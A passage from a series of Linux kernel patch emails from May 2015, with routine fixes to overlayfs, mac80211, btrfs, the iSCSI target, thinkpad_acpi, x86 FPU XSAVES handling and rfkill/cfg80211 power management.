-EROFS; + ovl_path_upper(parent, &parentpath); upperdir = parentpath.dentry; diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c index 2578a0c0677d..692ceda3bc21 100644 --- a/fs/overlayfs/dir.c +++ b/fs/overlayfs/dir.c @@ -222,6 +222,9 @@ static struct dentry *ovl_clear_empty(struct dentry *dentry, struct kstat stat; int err; + if (WARN_ON(!workdir)) + return ERR_PTR(-EROFS); + err = ovl_lock_rename_workdir(workdir, upperdir); if (err) goto out; @@ -322,6 +325,9 @@ static int ovl_create_over_whiteout(struct dentry *dentry, struct inode *inode, struct dentry *newdentry; int err; + if (WARN_ON(!workdir)) + return -EROFS; + err = ovl_lock_rename_workdir(workdir, upperdir); if (err) goto out; @@ -506,6 +512,9 @@ static int ovl_remove_and_whiteout(struct dentry *dentry, bool is_dir) struct dentry *opaquedir = NULL; int err; + if (WARN_ON(!workdir)) + return -EROFS; + if (is_dir) { if (OVL_TYPE_MERGE_OR_LOWER(ovl_path_type(dentry))) { opaquedir = ovl_check_empty_and_clear(dentry); diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c index 5f0d1993e6e3..bf8537c7f455 100644 --- a/fs/overlayfs/super.c +++ b/fs/overlayfs/super.c @@ -529,7 +529,7 @@ static int ovl_remount(struct super_block *sb, int *flags, char *data) { struct ovl_fs *ufs = sb->s_fs_info; - if (!(*flags & MS_RDONLY) && !ufs->upper_mnt) + if (!(*flags & MS_RDONLY) && (!ufs->upper_mnt || !ufs->workdir)) return -EROFS; return 0; @@ -925,9 +925,10 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent) ufs->workdir = ovl_workdir_create(ufs->upper_mnt, workpath.dentry); err = PTR_ERR(ufs->workdir); if (IS_ERR(ufs->workdir)) { - pr_err("overlayfs: failed to create directory %s/%s\n", - ufs->config.workdir, OVL_WORKDIR_NAME); - goto out_put_upper_mnt; + pr_warn("overlayfs: failed to create directory %s/%s (errno: %i); mounting read-only\n", + ufs->config.workdir, OVL_WORKDIR_NAME, -err); + sb->s_flags |= MS_RDONLY; + ufs->workdir = NULL; } } @@ -997,7 +998,6 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent) kfree(ufs->lower_mnt); out_put_workdir: dput(ufs->workdir); -out_put_upper_mnt: mntput(ufs->upper_mnt); out_put_lowerpath: for (i = 0; i < numlower; i++) From 22d3a3c829fa9ecdb493d1f1f2838d543f8d86a3 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 19 May 2015 15:40:21 +0200 Subject: [PATCH 113/872] mac80211: don't use napi_gro_receive() outside NAPI context No matter how the driver manages its NAPI context, there's no way sending frames to it from a timer can be correct, since it would corrupt the internal GRO lists. To avoid that, always use the non-NAPI path when releasing frames from the timer. Cc: stable@vger.kernel.org Reported-by: Jean Trivelly Signed-off-by: Johannes Berg --- net/mac80211/ieee80211_i.h | 3 +++ net/mac80211/rx.c | 5 +++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index ab46ab4a7249..cdc374296245 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -205,6 +205,8 @@ enum ieee80211_packet_rx_flags { * @IEEE80211_RX_CMNTR: received on cooked monitor already * @IEEE80211_RX_BEACON_REPORTED: This frame was already reported * to cfg80211_report_obss_beacon(). + * @IEEE80211_RX_REORDER_TIMER: this frame is released by the + * reorder buffer timeout timer, not the normal RX path * * These flags are used across handling multiple interfaces * for a single frame. @@ -212,6 +214,7 @@ enum ieee80211_packet_rx_flags { enum ieee80211_rx_flags { IEEE80211_RX_CMNTR = BIT(0), IEEE80211_RX_BEACON_REPORTED = BIT(1), + IEEE80211_RX_REORDER_TIMER = BIT(2), }; struct ieee80211_rx_data { diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c index 260eed45b6d2..5793f75c5ffd 100644 --- a/net/mac80211/rx.c +++ b/net/mac80211/rx.c @@ -2121,7 +2121,8 @@ ieee80211_deliver_skb(struct ieee80211_rx_data *rx) /* deliver to local stack */ skb->protocol = eth_type_trans(skb, dev); memset(skb->cb, 0, sizeof(skb->cb)); - if (rx->local->napi) + if (!(rx->flags & IEEE80211_RX_REORDER_TIMER) && + rx->local->napi) napi_gro_receive(rx->local->napi, skb); else netif_receive_skb(skb); @@ -3231,7 +3232,7 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid) /* This is OK -- must be QoS data frame */ .security_idx = tid, .seqno_idx = tid, - .flags = 0, + .flags = IEEE80211_RX_REORDER_TIMER, }; struct tid_ampdu_rx *tid_agg_rx; From e46b5a6470a5e2c8e1096f8f60887ac19949055b Mon Sep 17 00:00:00 2001 From: Shawn Guo Date: Tue, 19 May 2015 22:06:41 +0800 Subject: [PATCH 114/872] ARM: dts: fix imx27 dtb build rule The i.MX27 dtb build should be controlled by CONFIG_SOC_IMX27 rather than CONFIG_SOC_IMX31. Signed-off-by: Shawn Guo Fixes: cb612390e546 ("ARM: dts: Only build dtb if associated Arch and/or SoC is enabled") Cc: --- arch/arm/boot/dts/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/Makefile b/arch/arm/boot/dts/Makefile index 86217db2937a..992736b5229b 100644 --- a/arch/arm/boot/dts/Makefile +++ b/arch/arm/boot/dts/Makefile @@ -223,7 +223,7 @@ dtb-$(CONFIG_SOC_IMX25) += \ imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dtb \ imx25-karo-tx25.dtb \ imx25-pdk.dtb -dtb-$(CONFIG_SOC_IMX31) += \ +dtb-$(CONFIG_SOC_IMX27) += \ imx27-apf27.dtb \ imx27-apf27dev.dtb \ imx27-eukrea-mbimxsd27-baseboard.dtb \ From 73e85ed36a96324a2ba5990024f621bf9907fbd5 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Tue, 19 May 2015 14:18:35 +0200 Subject: [PATCH 115/872] mac802154: select CRYPTO when needed The mac802154 subsystem uses functions from the crypto layer and correctly selects the individual crypto algorithms, but fails to build when the crypto layer is disabled altogether: crypto/built-in.o: In function `crypto_ctr_free': :(.text+0x80): undefined reference to `crypto_drop_spawn' crypto/built-in.o: In function `crypto_rfc3686_free': :(.text+0xac): undefined reference to `crypto_drop_spawn' crypto/built-in.o: In function `crypto_ctr_crypt': :(.text+0x2f0): undefined reference to `blkcipher_walk_virt_block' :(.text+0x2f8): undefined reference to `crypto_inc' To solve that, this patch also selects the core crypto code, like all other users of that code do. Signed-off-by: Arnd Bergmann Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- net/mac802154/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/net/mac802154/Kconfig b/net/mac802154/Kconfig index aa462b480a39..fb45287ebac3 100644 --- a/net/mac802154/Kconfig +++ b/net/mac802154/Kconfig @@ -2,6 +2,7 @@ config MAC802154 tristate "Generic IEEE 802.15.4 Soft Networking Stack (mac802154)" depends on IEEE802154 select CRC_CCITT + select CRYPTO select CRYPTO_AUTHENC select CRYPTO_CCM select CRYPTO_CTR From 011c391a090e243ef0116805a6ad77df74c22cc0 Mon Sep 17 00:00:00 2001 From: Johan Hedberg Date: Tue, 19 May 2015 21:06:04 +0300 Subject: [PATCH 116/872] Bluetooth: Add debug logs for legacy SMP crypto functions To help debug legacy SMP crypto functions add debug logs of the various values involved. Signed-off-by: Johan Hedberg Signed-off-by: Marcel Holtmann --- net/bluetooth/smp.c | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c index 1ab3dc9c8f99..659371af39e4 100644 --- a/net/bluetooth/smp.c +++ b/net/bluetooth/smp.c @@ -371,6 +371,8 @@ static int smp_e(struct crypto_blkcipher *tfm, const u8 *k, u8 *r) uint8_t tmp[16], data[16]; int err; + SMP_DBG("k %16phN r %16phN", k, r); + if (!tfm) { BT_ERR("tfm %p", tfm); return -EINVAL; @@ -400,6 +402,8 @@ static int smp_e(struct crypto_blkcipher *tfm, const u8 *k, u8 *r) /* Most significant octet of encryptedData corresponds to data[0] */ swap_buf(data, r, 16); + SMP_DBG("r %16phN", r); + return err; } @@ -410,6 +414,10 @@ static int smp_c1(struct crypto_blkcipher *tfm_aes, const u8 k[16], u8 p1[16], p2[16]; int err; + SMP_DBG("k %16phN r %16phN", k, r); + SMP_DBG("iat %u ia %6phN rat %u ra %6phN", _iat, ia, _rat, ra); + SMP_DBG("preq %7phN pres %7phN", preq, pres); + memset(p1, 0, 16); /* p1 = pres || preq || _rat || _iat */ @@ -418,10 +426,7 @@ static int smp_c1(struct crypto_blkcipher *tfm_aes, const u8 k[16], memcpy(p1 + 2, preq, 7); memcpy(p1 + 9, pres, 7); - /* p2 = padding || ia || ra */ - memcpy(p2, ra, 6); - memcpy(p2 + 6, ia, 6); - memset(p2 + 12, 0, 4); + SMP_DBG("p1 %16phN", p1); /* res = r XOR p1 */ u128_xor((u128 *) res, (u128 *) r, (u128 *) p1); @@ -433,6 +438,13 @@ static int smp_c1(struct crypto_blkcipher *tfm_aes, const u8 k[16], return err; } + /* p2 = padding || ia || ra */ + memcpy(p2, ra, 6); + memcpy(p2 + 6, ia, 6); + memset(p2 + 12, 0, 4); + + SMP_DBG("p2 %16phN", p2); + /* res = res XOR p2 */ u128_xor((u128 *) res, (u128 *) res, (u128 *) p2); From ee7619f2eb21304dcc846b8dc8f8c3d6cbe11792 Mon Sep 17 00:00:00 2001 From: Nicholas Bellinger Date: Tue, 19 May 2015 15:10:44 -0700 Subject: [PATCH 117/872] target: Drop signal_pending checks after interruptible lock acquire Once upon a time, iscsit_get_tpg() was using an un-interruptible lock. The signal_pending() usage was a check to allow userspace to break out of the operation with SIGINT. AFAICT, there's no reason why this is necessary anymore, and as reported by Alexey can be potentially dangerous. Also, go ahead and drop the other two problematic cases within iscsit_access_np() and sbc_compare_and_write() as well. Found by Linux Driver Verification project (linuxtesting.org). Reported-by: Alexey Khoroshilov Signed-off-by: Nicholas Bellinger --- drivers/target/iscsi/iscsi_target.c | 2 +- drivers/target/iscsi/iscsi_target_tpg.c | 5 +---- drivers/target/target_core_sbc.c | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c index 34871a628b11..74e6114ff18f 100644 --- a/drivers/target/iscsi/iscsi_target.c +++ b/drivers/target/iscsi/iscsi_target.c @@ -230,7 +230,7 @@ int iscsit_access_np(struct iscsi_np *np, struct iscsi_portal_group *tpg) * Here we serialize access across the TIQN+TPG Tuple. */ ret = down_interruptible(&tpg->np_login_sem); - if ((ret != 0) || signal_pending(current)) + if (ret != 0) return -1; spin_lock_bh(&tpg->tpg_state_lock); diff --git a/drivers/target/iscsi/iscsi_target_tpg.c b/drivers/target/iscsi/iscsi_target_tpg.c index e8a240818353..5e3295fe404d 100644 --- a/drivers/target/iscsi/iscsi_target_tpg.c +++ b/drivers/target/iscsi/iscsi_target_tpg.c @@ -161,10 +161,7 @@ struct iscsi_portal_group *iscsit_get_tpg_from_np( int iscsit_get_tpg( struct iscsi_portal_group *tpg) { - int ret; - - ret = mutex_lock_interruptible(&tpg->tpg_access_lock); - return ((ret != 0) || signal_pending(current)) ? -1 : 0; + return mutex_lock_interruptible(&tpg->tpg_access_lock); } void iscsit_put_tpg(struct iscsi_portal_group *tpg) diff --git a/drivers/target/target_core_sbc.c b/drivers/target/target_core_sbc.c index 8855781ac653..733824e3825f 100644 --- a/drivers/target/target_core_sbc.c +++ b/drivers/target/target_core_sbc.c @@ -568,7 +568,7 @@ sbc_compare_and_write(struct se_cmd *cmd) * comparision using SGLs at cmd->t_bidi_data_sg.. */ rc = down_interruptible(&dev->caw_sem); - if ((rc != 0) || signal_pending(current)) { + if (rc != 0) { cmd->transport_complete_callback = NULL; return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; } From 2c2ed5aa0154c0be67f98c970de6b5587dbc045a Mon Sep 17 00:00:00 2001 From: Mark Fasheh Date: Tue, 19 May 2015 12:49:50 -0700 Subject: [PATCH 118/872] btrfs: clear 'ret' in btrfs_check_shared() loop btrfs_check_shared() is leaking a return value of '1' from find_parent_nodes(). As a result, callers (in this case, extent_fiemap()) are told extents are shared when they are not. This in turn broke fiemap on btrfs for kernels v3.18 and up. The fix is simple - we just have to clear 'ret' after we are done processing the results of find_parent_nodes(). It wasn't clear to me at first what was happening with return values in btrfs_check_shared() and find_parent_nodes() - thanks to Josef for the help on irc. I added documentation to both functions to make things more clear for the next hacker who might come across them. If we could queue this up for -stable too that would be great. Signed-off-by: Mark Fasheh Reviewed-by: Josef Bacik Signed-off-by: Chris Mason --- fs/btrfs/backref.c | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c index 9de772ee0031..614aaa1969bd 100644 --- a/fs/btrfs/backref.c +++ b/fs/btrfs/backref.c @@ -880,6 +880,8 @@ static int __add_keyed_refs(struct btrfs_fs_info *fs_info, * indirect refs to their parent bytenr. * When roots are found, they're added to the roots list * + * NOTE: This can return values > 0 + * * FIXME some caching might speed things up */ static int find_parent_nodes(struct btrfs_trans_handle *trans, @@ -1198,6 +1200,19 @@ int btrfs_find_all_roots(struct btrfs_trans_handle *trans, return ret; } +/** + * btrfs_check_shared - tell us whether an extent is shared + * + * @trans: optional trans handle + * + * btrfs_check_shared uses the backref walking code but will short + * circuit as soon as it finds a root or inode that doesn't match the + * one passed in. This provides a significant performance benefit for + * callers (such as fiemap) which want to know whether the extent is + * shared but do not need a ref count. + * + * Return: 0 if extent is not shared, 1 if it is shared, < 0 on error. + */ int btrfs_check_shared(struct btrfs_trans_handle *trans, struct btrfs_fs_info *fs_info, u64 root_objectid, u64 inum, u64 bytenr) @@ -1226,11 +1241,13 @@ int btrfs_check_shared(struct btrfs_trans_handle *trans, ret = find_parent_nodes(trans, fs_info, bytenr, elem.seq, tmp, roots, NULL, root_objectid, inum); if (ret == BACKREF_FOUND_SHARED) { + /* this is the only condition under which we return 1 */ ret = 1; break; } if (ret < 0 && ret != -ENOENT) break; + ret = 0; node = ulist_next(tmp, &uiter); if (!node) break; From a96295965b600f2dc6ad661c4803c86e87db3d7b Mon Sep 17 00:00:00 2001 From: Filipe Manana Date: Mon, 18 May 2015 19:11:40 +0100 Subject: [PATCH 119/872] Btrfs: fix racy system chunk allocation when setting block group ro If while setting a block group read-only we end up allocating a system chunk, through check_system_chunk(), we were not doing it while holding the chunk mutex which is a problem if a concurrent chunk allocation is happening, through do_chunk_alloc(), as it means both block groups can end up using the same logical addresses and physical regions in the device(s). So make sure we hold the chunk mutex. Cc: stable@vger.kernel.org # 4.0+ Fixes: 2f0810880f08 ("btrfs: delete chunk allocation attemp when setting block group ro") Signed-off-by: Filipe Manana Signed-off-by: Chris Mason --- fs/btrfs/extent-tree.c | 2 ++ fs/btrfs/volumes.c | 1 + 2 files changed, 3 insertions(+) diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c index 7effed6f2fa6..45e3f086790b 100644 --- a/fs/btrfs/extent-tree.c +++ b/fs/btrfs/extent-tree.c @@ -8842,7 +8842,9 @@ int btrfs_set_block_group_ro(struct btrfs_root *root, out: if (cache->flags & BTRFS_BLOCK_GROUP_SYSTEM) { alloc_flags = update_block_group_flags(root, cache->flags); + lock_chunks(root->fs_info->chunk_root); check_system_chunk(trans, root, alloc_flags); + unlock_chunks(root->fs_info->chunk_root); } mutex_unlock(&root->fs_info->ro_block_group_mutex); diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c index 96aebf3bcd5b..174f5e1e00ab 100644 --- a/fs/btrfs/volumes.c +++ b/fs/btrfs/volumes.c @@ -4625,6 +4625,7 @@ int btrfs_alloc_chunk(struct btrfs_trans_handle *trans, { u64 chunk_offset; + ASSERT(mutex_is_locked(&extent_root->fs_info->chunk_mutex)); chunk_offset = find_next_chunk(extent_root->fs_info); return __btrfs_alloc_chunk(trans, extent_root, chunk_offset, type); } From 5fb73bc2c8301ad106df0e858e60875cd2ae95cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Bj=C3=B8rn=20Mork?= Date: Tue, 19 May 2015 19:45:03 +0200 Subject: [PATCH 120/872] thinkpad_acpi: Revert unintentional device attribute renaming MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The conversion to DEVICE_ATTR_* macros failed to fixup a few cases where the old attribute names didn't match the show/store function names. Instead of renaming the functions, the attributes were renamed. This caused an unintentional API change. The hwmon required 'name' attribute were among the renamed attribute, causing libsensors to fail to detect the hwmon device at all. Fix by using the DEVICE_ATTR macro for these attributes, allowing the show/store functions to keep their system specific prefixes. Fixes: b4dd04ac6ef8 ("thinkpad_acpi: use DEVICE_ATTR_* macros") Cc: Bastien Nocera Signed-off-by: Bjørn Mork Acked-by: Henrique de Moraes Holschuh Signed-off-by: Darren Hart --- drivers/platform/x86/thinkpad_acpi.c | 37 ++++++++++++++-------------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c index 9bb9ad6d4a1b..28f328136f0d 100644 --- a/drivers/platform/x86/thinkpad_acpi.c +++ b/drivers/platform/x86/thinkpad_acpi.c @@ -2897,7 +2897,7 @@ static ssize_t hotkey_wakeup_reason_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%d\n", hotkey_wakeup_reason); } -static DEVICE_ATTR_RO(hotkey_wakeup_reason); +static DEVICE_ATTR(wakeup_reason, S_IRUGO, hotkey_wakeup_reason_show, NULL); static void hotkey_wakeup_reason_notify_change(void) { @@ -2913,7 +2913,8 @@ static ssize_t hotkey_wakeup_hotunplug_complete_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%d\n", hotkey_autosleep_ack); } -static DEVICE_ATTR_RO(hotkey_wakeup_hotunplug_complete); +static DEVICE_ATTR(wakeup_hotunplug_complete, S_IRUGO, + hotkey_wakeup_hotunplug_complete_show, NULL); static void hotkey_wakeup_hotunplug_complete_notify_change(void) { @@ -2978,8 +2979,8 @@ static struct attribute *hotkey_attributes[] __initdata = { &dev_attr_hotkey_enable.attr, &dev_attr_hotkey_bios_enabled.attr, &dev_attr_hotkey_bios_mask.attr, - &dev_attr_hotkey_wakeup_reason.attr, - &dev_attr_hotkey_wakeup_hotunplug_complete.attr, + &dev_attr_wakeup_reason.attr, + &dev_attr_wakeup_hotunplug_complete.attr, &dev_attr_hotkey_mask.attr, &dev_attr_hotkey_all_mask.attr, &dev_attr_hotkey_recommended_mask.attr, @@ -4393,12 +4394,13 @@ static ssize_t wan_enable_store(struct device *dev, attr, buf, count); } -static DEVICE_ATTR_RW(wan_enable); +static DEVICE_ATTR(wwan_enable, S_IWUSR | S_IRUGO, + wan_enable_show, wan_enable_store); /* --------------------------------------------------------------------- */ static struct attribute *wan_attributes[] = { - &dev_attr_wan_enable.attr, + &dev_attr_wwan_enable.attr, NULL }; @@ -8138,7 +8140,8 @@ static ssize_t fan_pwm1_enable_store(struct device *dev, return count; } -static DEVICE_ATTR_RW(fan_pwm1_enable); +static DEVICE_ATTR(pwm1_enable, S_IWUSR | S_IRUGO, + fan_pwm1_enable_show, fan_pwm1_enable_store); /* sysfs fan pwm1 ------------------------------------------------------ */ static ssize_t fan_pwm1_show(struct device *dev, @@ -8198,7 +8201,7 @@ static ssize_t fan_pwm1_store(struct device *dev, return (rc) ? rc : count; } -static DEVICE_ATTR_RW(fan_pwm1); +static DEVICE_ATTR(pwm1, S_IWUSR | S_IRUGO, fan_pwm1_show, fan_pwm1_store); /* sysfs fan fan1_input ------------------------------------------------ */ static ssize_t fan_fan1_input_show(struct device *dev, @@ -8215,7 +8218,7 @@ static ssize_t fan_fan1_input_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%u\n", speed); } -static DEVICE_ATTR_RO(fan_fan1_input); +static DEVICE_ATTR(fan1_input, S_IRUGO, fan_fan1_input_show, NULL); /* sysfs fan fan2_input ------------------------------------------------ */ static ssize_t fan_fan2_input_show(struct device *dev, @@ -8232,7 +8235,7 @@ static ssize_t fan_fan2_input_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%u\n", speed); } -static DEVICE_ATTR_RO(fan_fan2_input); +static DEVICE_ATTR(fan2_input, S_IRUGO, fan_fan2_input_show, NULL); /* sysfs fan fan_watchdog (hwmon driver) ------------------------------- */ static ssize_t fan_fan_watchdog_show(struct device_driver *drv, @@ -8265,8 +8268,8 @@ static DRIVER_ATTR(fan_watchdog, S_IWUSR | S_IRUGO, /* --------------------------------------------------------------------- */ static struct attribute *fan_attributes[] = { - &dev_attr_fan_pwm1_enable.attr, &dev_attr_fan_pwm1.attr, - &dev_attr_fan_fan1_input.attr, + &dev_attr_pwm1_enable.attr, &dev_attr_pwm1.attr, + &dev_attr_fan1_input.attr, NULL, /* for fan2_input */ NULL }; @@ -8400,7 +8403,7 @@ static int __init fan_init(struct ibm_init_struct *iibm) if (tp_features.second_fan) { /* attach second fan tachometer */ fan_attributes[ARRAY_SIZE(fan_attributes)-2] = - &dev_attr_fan_fan2_input.attr; + &dev_attr_fan2_input.attr; } rc = sysfs_create_group(&tpacpi_sensors_pdev->dev.kobj, &fan_attr_group); @@ -8848,7 +8851,7 @@ static ssize_t thinkpad_acpi_pdev_name_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%s\n", TPACPI_NAME); } -static DEVICE_ATTR_RO(thinkpad_acpi_pdev_name); +static DEVICE_ATTR(name, S_IRUGO, thinkpad_acpi_pdev_name_show, NULL); /* --------------------------------------------------------------------- */ @@ -9390,8 +9393,7 @@ static void thinkpad_acpi_module_exit(void) hwmon_device_unregister(tpacpi_hwmon); if (tp_features.sensors_pdev_attrs_registered) - device_remove_file(&tpacpi_sensors_pdev->dev, - &dev_attr_thinkpad_acpi_pdev_name); + device_remove_file(&tpacpi_sensors_pdev->dev, &dev_attr_name); if (tpacpi_sensors_pdev) platform_device_unregister(tpacpi_sensors_pdev); if (tpacpi_pdev) @@ -9512,8 +9514,7 @@ static int __init thinkpad_acpi_module_init(void) thinkpad_acpi_module_exit(); return ret; } - ret = device_create_file(&tpacpi_sensors_pdev->dev, - &dev_attr_thinkpad_acpi_pdev_name); + ret = device_create_file(&tpacpi_sensors_pdev->dev, &dev_attr_name); if (ret) { pr_err("unable to create sysfs hwmon device attributes\n"); thinkpad_acpi_module_exit(); From 94c78cb4523c246ec37959436f04e7c946f7494b Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 20 May 2015 11:31:47 +0200 Subject: [PATCH 121/872] mac80211: fix memory leak My recent change here introduced a possible memory leak if the driver registers an invalid cipher schemes. This won't really happen in practice, but fix the leak nonetheless. Fixes: e3a55b5399d55 ("mac80211: validate cipher scheme PN length better") Signed-off-by: Johannes Berg --- net/mac80211/main.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/net/mac80211/main.c b/net/mac80211/main.c index 3c956c5f99b2..99d27babd9f0 100644 --- a/net/mac80211/main.c +++ b/net/mac80211/main.c @@ -770,8 +770,10 @@ static int ieee80211_init_cipher_suites(struct ieee80211_local *local) for (r = 0; r < local->hw.n_cipher_schemes; r++) { suites[w++] = cs[r].cipher; - if (WARN_ON(cs[r].pn_len > IEEE80211_MAX_PN_LEN)) + if (WARN_ON(cs[r].pn_len > IEEE80211_MAX_PN_LEN)) { + kfree(suites); return -EINVAL; + } } } From 179655fcd2f40edeae515da1f4361c7ddc56b8ed Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 20 May 2015 09:27:03 +0200 Subject: [PATCH 122/872] at86rf230: add missing cca ed level values This patch add missing values for at86rf212 ed level values. Currently there are 15 values and the register setting supports 16 different ed level values. Signed-off-by: Alexander Aring Reported-by: Craig Younkins Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index d417ceb67626..2f25a5ed8247 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -892,12 +892,12 @@ static const s32 at86rf23x_ed_levels[AT86RF2XX_MAX_ED_LEVELS + 1] = { static const s32 at86rf212_ed_levels_100[AT86RF2XX_MAX_ED_LEVELS + 1] = { -10000, -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, - -8000, -7800, -7600, -7400, -7200, + -8000, -7800, -7600, -7400, -7200, -7000, }; static const s32 at86rf212_ed_levels_98[AT86RF2XX_MAX_ED_LEVELS + 1] = { -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, -8000, - -7800, -7600, -7400, -7200, -7000, + -7800, -7600, -7400, -7200, -7000, -6800, }; static inline int From e88221c50cadade0eb4f7f149f4967d760212695 Mon Sep 17 00:00:00 2001 From: Ingo Molnar Date: Wed, 20 May 2015 11:45:30 +0200 Subject: [PATCH 123/872] x86/fpu: Disable XSAVES* support for now The kernel's handling of 'compacted' xsave state layout is buggy: http://marc.info/?l=linux-kernel&m=142967852317199 I don't have such a system, and the description there is vague, but from extrapolation I guess that there were two kinds of bugs observed: - boot crashes, due to size calculations being wrong and the dynamic allocation allocating a too small xstate area. (This is now fixed in the new FPU code - but still present in stable kernels.) - FPU state corruption and ABI breakage: if signal handlers try to change the FPU state in standard format, which then the kernel tries to restore in the compacted format. These breakages are scary, but they only occur on a small number of systems that have XSAVES* CPU support. Yet we have had XSAVES support in the upstream kernel for a large number of stable kernel releases, and the fixes are involved and unproven. So do the safe resolution first: disable XSAVES* support and only use the standard xstate format. This makes the code work and is easy to backport. On top of this we can work on enabling (and testing!) proper compacted format support, without backporting pressure, on top of the new, cleaned up FPU code. Cc: Cc: Andy Lutomirski Cc: Borislav Petkov Cc: Dave Hansen Cc: Fenghua Yu Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Oleg Nesterov Cc: Peter Zijlstra Cc: Thomas Gleixner Signed-off-by: Ingo Molnar --- arch/x86/kernel/i387.c | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/arch/x86/kernel/i387.c b/arch/x86/kernel/i387.c index 009183276bb7..6185d3141219 100644 --- a/arch/x86/kernel/i387.c +++ b/arch/x86/kernel/i387.c @@ -173,6 +173,21 @@ static void init_thread_xstate(void) xstate_size = sizeof(struct i387_fxsave_struct); else xstate_size = sizeof(struct i387_fsave_struct); + + /* + * Quirk: we don't yet handle the XSAVES* instructions + * correctly, as we don't correctly convert between + * standard and compacted format when interfacing + * with user-space - so disable it for now. + * + * The difference is small: with recent CPUs the + * compacted format is only marginally smaller than + * the standard FPU state format. + * + * ( This is easy to backport while we are fixing + * XSAVES* support. ) + */ + setup_clear_cpu_cap(X86_FEATURE_XSAVES); } /* From 28f297a7af7e00500d72e6c0421c7e10ec96f627 Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Sat, 16 May 2015 14:23:55 +0200 Subject: [PATCH 124/872] net: rfkill: Switch to PM ops Use dev_pm_ops instead of the legacy suspend/resume callbacks for the rfkill class suspend and resume operations. Signed-off-by: Lars-Peter Clausen Signed-off-by: Johannes Berg --- net/rfkill/core.c | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/net/rfkill/core.c b/net/rfkill/core.c index fa7cd792791c..f12149a29cb1 100644 --- a/net/rfkill/core.c +++ b/net/rfkill/core.c @@ -794,7 +794,8 @@ void rfkill_resume_polling(struct rfkill *rfkill) } EXPORT_SYMBOL(rfkill_resume_polling); -static int rfkill_suspend(struct device *dev, pm_message_t state) +#ifdef CONFIG_PM_SLEEP +static int rfkill_suspend(struct device *dev) { struct rfkill *rfkill = to_rfkill(dev); @@ -818,13 +819,18 @@ static int rfkill_resume(struct device *dev) return 0; } +static SIMPLE_DEV_PM_OPS(rfkill_pm_ops, rfkill_suspend, rfkill_resume); +#define RFKILL_PM_OPS (&rfkill_pm_ops) +#else +#define RFKILL_PM_OPS NULL +#endif + static struct class rfkill_class = { .name = "rfkill", .dev_release = rfkill_release, .dev_groups = rfkill_dev_groups, .dev_uevent = rfkill_dev_uevent, - .suspend = rfkill_suspend, - .resume = rfkill_resume, + .pm = RFKILL_PM_OPS, }; bool rfkill_blocked(struct rfkill *rfkill) From 262918d847c0f66a0ec05db9de7571ed72e422af Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Sat, 16 May 2015 14:35:54 +0200 Subject: [PATCH 125/872] cfg80211: Switch to PM ops Use dev_pm_ops instead of the legacy suspend/resume callbacks for the wiphy class suspend and resume operations. Signed-off-by: Lars-Peter Clausen Signed-off-by: Johannes Berg --- net/wireless/sysfs.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c index 9ee6bc1a7610..9cee0220665d 100644 --- a/net/wireless/sysfs.c +++ b/net/wireless/sysfs.c @@ -86,7 +86,7 @@ static int wiphy_uevent(struct device *dev, struct kobj_uevent_env *env) return 0; } -#ifdef CONFIG_PM +#ifdef CONFIG_PM_SLEEP static void cfg80211_leave_all(struct cfg80211_registered_device *rdev) { struct wireless_dev *wdev; @@ -95,7 +95,7 @@ static void cfg80211_leave_all(struct cfg80211_registered_device *rdev) cfg80211_leave(rdev, wdev); } -static int wiphy_suspend(struct device *dev, pm_message_t state) +static int wiphy_suspend(struct device *dev) { struct cfg80211_registered_device *rdev = dev_to_rdev(dev); int ret = 0; @@ 